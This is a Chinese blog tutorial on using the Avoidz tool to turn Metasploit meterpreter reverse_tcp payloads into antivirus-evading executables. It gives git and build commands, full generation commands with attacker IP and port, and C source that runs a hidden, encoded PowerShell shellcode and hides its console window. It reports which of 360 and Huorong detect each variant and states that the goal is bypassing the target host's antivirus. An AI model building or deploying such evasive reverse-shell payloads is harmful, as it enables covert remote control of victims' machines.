远控免杀专题11-Avoidz免杀

0x01 免杀能力一查表

在这里插入图片描述
几点说明:

1、上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。

2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。

3、由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2020.01.01),火绒版本5.0.34.16(2020.01.01),360安全卫士12.0.0.2002(2020.01.01)。

4、其他杀软的检测指标是在virustotal.com(简称VT)上在线查杀,所以可能只是代表了静态查杀能力,数据仅供参考,不足以作为免杀的精确判断指标。

5、完全不必要苛求一种免杀技术能bypass所有杀软,这样的技术肯定是有的,只是没被公开,一旦公开第二天就能被杀了,其实我们只要能bypass目标主机上的杀软就足够了。

0x02 avoidz介绍

Avoidz是一个比较使用比较简单的小工具,利用msf生成powershell的shellocde,然后利用c#、python、go、ruby等语言对shellcode进行编译生成exe而达到免杀的效果,套路比较简单,但免杀效果还算不错。

0x03安装avoidz

avoidz使用是非常简单的,一行命令就可以,但安装比较费劲。因为官方是3年前更新的,里面有些错误,按官方的setup.sh是没法安装成功的。

首先从github上clone到本地


git clone https://github.com/M4sc3r4n0/avoidz

在这里插入图片描述
进入avoidz目录,执行chmod +x setup.sh

执行安装程序./setup.sh

会要求按照ruby、msf、wine、wine-python、wine-pyinstaller、golong等。
在这里插入图片描述

0x04 avoidz使用说明

安装好之后,使用起来非常非常简单,只有四个参数。

  -h, --lhost value                ip_addr|default = 127.0.0.1-p, --lport value                port_number|default = 4444-m, --payload value              payload to use|default = windows/meterpreter/reverse_tcp-f, --format value               output format: c1, c2, cs, py, go

参数说明:

-h msf监听的IP,也就是攻击者的

-p msf监听的端口

-m msf的payload

-f 提供了5种编译格式,三种c/c#,一种python,一种go,都是生成exe文件

默认生成的payload目录为/root/目录下。

0x05 使用avoidz编译C#生成exe

提供3种C代码编译成exe的方式,想了解详情的可以cat avoidz.rb查看具体区别。

我以第一种为例进行测试

./avoidz.rb -h 192.168.142.134 -p 5555 -m windows/meterpreter/reverse_tcp -f c1

这种方式的C代码为

#include <windows.h>
int shellCode(){system("color 63");system("powershell.exe -nop -win Hidden -noni -enc #{powershell_encoded}");/*((Shell Code into the console))*/return 0;
}
void hide(){HWND stealth;AllocConsole();stealth = FindWindowA("ConsoleWindowClass",NULL);ShowWindow (stealth,0);
}
int main(){hide();shellCode();return 0;
}
}

在这里插入图片描述
执行后可正常上线
在这里插入图片描述
开启杀软进行测试,静态测试没问题,行为检测马上露馅。
在这里插入图片描述

0x06 使用avoidz编译python生成exe

使用python生成exe文件

./avoidz.rb -h 10.211.55.2 -p 3333 -m windows/meterpreter/reverse_tcp -f py

静态查杀没问题,行为检测依据被拦
在这里插入图片描述

0x07 使用avoidz编译golang生成exe

使用go生成exe文件

./avoidz.rb -h 10.211.55.2 -p 3333 -m windows/meterpreter/reverse_tcp -f go

go版本的静态查杀都没通过,行为检测依据被拦
在这里插入图片描述

0x07 小结

avoidz的原理还是比较简单的,msfvenom生成powershell的shellcode,然后各种语言编译一下生成exe,静态检测查杀率还算可以,但行为检测就很容易被查杀出来,和TheFatRat具有相同的缺陷。倒是可以借鉴下他的原理,自己写个免杀工具。

0x08 参考

官方使用教程:https://www.youtube.com/watch?v=ZilOByKkrVk

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/380239.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

CAP与流密码

CAP与流密码

CAP 中流密码的操作 1 、Cipher 下拉菜单中选中Stream 2&#xff0c;设置LFSR 参数&#xff0c;设置好参数后点击Set Key LFSR Size&#xff1a;表示有几个寄存器 Initial key:寄存器的初始状态&#xff0c;每个寄存器初始值是0或1&#xff0c;放在一起转化成十六进制 Feedbac…
阅读更多...
结构和其他数据形式

结构和其他数据形式

0x01 结构声明 结构声明&#xff08;structure declaration&#xff09;描述了一个结构的组织布局。 struct book{char title[MAXTITL];char author[MAXAUTL];float value; };该声明描述了一个由两个字符数组和一个float类型变量组成的结构。该声明并未创建实际的数据对象&am…
阅读更多...
添加LinkServer的两句代码

添加LinkServer的两句代码

sp_addlinkedserver linkserver,,SQLOLEDB,linkserver.comsp_addlinkedsrvlogin linkserver,false,null,sa,asdf第一句是添加一个名字为linkserver的链接服务器 地址是linkserver.com第二句是针对第一句添加的Linkserver添加一个访问帐号两句不能同时执行 要第一句执行成功后执…
阅读更多...
Cobaltstrike4.0系列教程(一)----简介与安装

Cobaltstrike4.0系列教程(一)----简介与安装

0x01-Cobaltstrike简介 Cobalt Strike是一款美国Red Team开发的渗透测试神器&#xff0c;常被业界人称为CS。这款神器许多大佬们都已经玩的很6&#xff0c;我一个菜鸡玩的略有心得&#xff0c;因此写一下自己的Cobaltstrike系列文章&#xff0c;希望给各位一点帮助。 最近这个…
阅读更多...
qt 试用 (3)配置编译源代码及调试

qt 试用 (3)配置编译源代码及调试

qt 试用 &#xff08;3&#xff09;配置编译源代码及调试qt creater是一个集成ide&#xff0c;像vc一样容易使用&#xff0c;所以首先下载带qt creater的qt sdk Offline installer - 1.4 GB http://qt.nokia.com/downloads/sdk-windows-cpp-offline这里的lib没有pdb和源代码…
阅读更多...
cobaltstrick4.0系列教程(2)---用户接口

cobaltstrick4.0系列教程(2)---用户接口

0x01 概述 Cobalt Strike 用户接口分为两部分。接口的顶部是会话或目标的视觉化展示。接口的底部展示了每个你与之交互的 Cobalt Strike 功能或会话的标签页。你可以点击这两部分之间的区域、按你的喜好重新调整这两个区域的大小。 0x02 工具条 Cobalt Strike 顶部的工具条…
阅读更多...
cobalt strick 4.0系列教程(3)---数据管理

cobalt strick 4.0系列教程(3)---数据管理

0x01 概述 Cobalt Strike 的团队服务器是行动期间 Cobalt Strike 收集的所有信息的中间商。Cobalt Strike 解析来自它的 Beacon payload 的输出&#xff0c;提取出目标、服务和凭据。 如果你想导出 Cobalt Strike 的数据&#xff0c;通过 Reporting → Export Data 。Cobalt S…
阅读更多...
calayer 与uiview

calayer 与uiview

研究Core Animation已经有段时间了&#xff0c;关于Core Animation&#xff0c;网上没什么好的介绍。苹果网站上有篇专门的总结性介绍&#xff0c;但是似乎原理性的东西不多&#xff0c;看得人云山雾罩&#xff0c;感觉&#xff0c;写那篇东西的人&#xff0c;其实是假 设读的人…
阅读更多...
代换-置换网络(SP网络)

代换-置换网络(SP网络)

0x01 概述 代换-置换网络是一系列被应用于分组密码中相关的数学运算&#xff0c;高级加密标准&#xff08;英语&#xff1a;AES&#xff09;、3-Way、Kuznyechik、PRESENT、SAFER、SHARK、Square都有涉用。这种加密网络使用明文块和密钥块作为输入&#xff0c;并通过交错的若干…
阅读更多...
【贪心】最小生成树Kruskal算法Python实现

【贪心】最小生成树Kruskal算法Python实现

文章目录 [toc]问题描述最小生成树的性质证明 Kruskal算法时间复杂性Python实现 个人主页&#xff1a;丷从心 系列专栏&#xff1a;贪心算法 问题描述 设 G ( V , E ) G (V , E) G(V,E)是无向连通带权图&#xff0c; E E E中每条边 ( v , w ) (v , w) (v,w)的权为 c [ v ] …
阅读更多...
HTML5 学习笔记

HTML5 学习笔记

HTML5 学习笔记 前言 该学习笔记的相关学习视频&#xff1a;【狂神说Java】HTML5完整教学通俗易懂 目前笔记只有简单的例子和框架&#xff0c;将来在实践中会进一步学习和补充内容 目录HTML5 学习笔记前言网页基本信息网页基本标签标题标签段落标签换行标签水平线标签字体样式…
阅读更多...
保护机制

保护机制

0x01 概述 操作系统提供了许多安全机制来尝试降低或阻止缓冲区溢出攻击带来的安全风险&#xff0c;包括DEP、ASLR等。在编写漏洞利用代码的时候&#xff0c;需要特别注意目标进程是否开启了DEP&#xff08;Linux下对应NX&#xff09;、ASLR&#xff08;Linux下对应PIE&#xf…
阅读更多...
机器学习降维算法一:PCA(主成分分析算法)

机器学习降维算法一:PCA(主成分分析算法)

引言&#xff1a; 机器学习领域中所谓的降维就是指采用某种映射方法&#xff0c;将原高维空间中的数据点映射到低维度的空间中。降维的本质是学习一个映射函数 f : x->y&#xff0c;其中x是原始数据点的表达&#xff0c;目前最多使用向量表达形式。 y是数据点映射后的低维向…
阅读更多...
VS 2005模板丢失找回的办法

VS 2005模板丢失找回的办法

安装其他插件的时候&#xff0c;常常模板丢失&#xff0c;比较郁闷&#xff0c;以前就用土办法&#xff0c;重装VS来解决这个问题&#xff0c;这次终于弄清楚怎么回事了&#xff0c;可以采取下面两个步骤解决1。复制ProjectTemplates和ItemTemplates&#xff0c;保证VS能找到相…
阅读更多...
一个简单的pwn例子---read函数

一个简单的pwn例子---read函数

内容&#xff1a; #include<stdio.h> void exploit() {system("/bin/sh"); } void func() {char str[0x20];read(0, str, 0x50); } int main() {func();return 0; }我们要做的是利用溢出执行exploit函数 分析&#xff1a; 先执行func函数&#xff0c;func函数…
阅读更多...
万网与阿里巴巴业务关系图解

万网与阿里巴巴业务关系图解

阿里巴巴在港上市公司今天发布公告称&#xff0c;计划分拆旗下中国万网赴美上市。那么万网与阿里巴巴其它业务是怎样个关系&#xff1f;且看我们分析。 随着传统企业大面积地转向互联网经营&#xff0c;用电子商务来服务客户&#xff0c;它们面临的第一个问题就是建站。针对这一…
阅读更多...
cobalt strick 4.0 系列教程(4)---监听器和基础设施管理

cobalt strick 4.0 系列教程(4)---监听器和基础设施管理

0x01 概述 任何行动的第一步都是建立基础设施。就 Cobalt Strike 而言&#xff0c;基础设施由一个或多个团队服务器、重定向器以及指向你的团队服务器和重定向器的 DNS 记录组成。一旦团队服务器启动并运行&#xff0c;你将需要连接到它并将其配置为接收来自受害系统的连接。监…
阅读更多...
【竞赛题解】Codeforces Round #710 (Div. 3)

【竞赛题解】Codeforces Round #710 (Div. 3)

B. Partial Replacement 题意&#xff1a;有字符串由.和*组成&#xff0c;可标记其中*&#xff0c;首尾的*必须被标记&#xff0c;使被标记的*之间距离不超过k&#xff0c;求最少的标记量 思路&#xff1a;首先从首尾出发确定首尾*的位置&#xff0c;再由首beg出发向后的k个元…
阅读更多...
基于RBAC模型的通用企业权限管理系统

基于RBAC模型的通用企业权限管理系统

1. 为什么我们需要基于RBAC模型的通用企业权限管理系统 管理信息系统是一个复杂的人机交互系统&#xff0c;其中每个具体环节都可能受到安全威胁。构建强健的权限管理系统&#xff0c;保证管理信息系统的安全性是十分重要的。权限管理系统是管理信息系统中代码重用性最高的模块…
阅读更多...
密码学加密算法分类_密码学中的国际数据加密算法(IDEA)

密码学加密算法分类_密码学中的国际数据加密算法(IDEA)

密码学加密算法分类Introduction 介绍 International Data Encryption Algorithm (IDEA) is a type of cryptography as a block cipher algorithm designed by "Xuejia Lai" and "James L.Massey" of ETH-Zrich and was first published in the 1991 yea…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023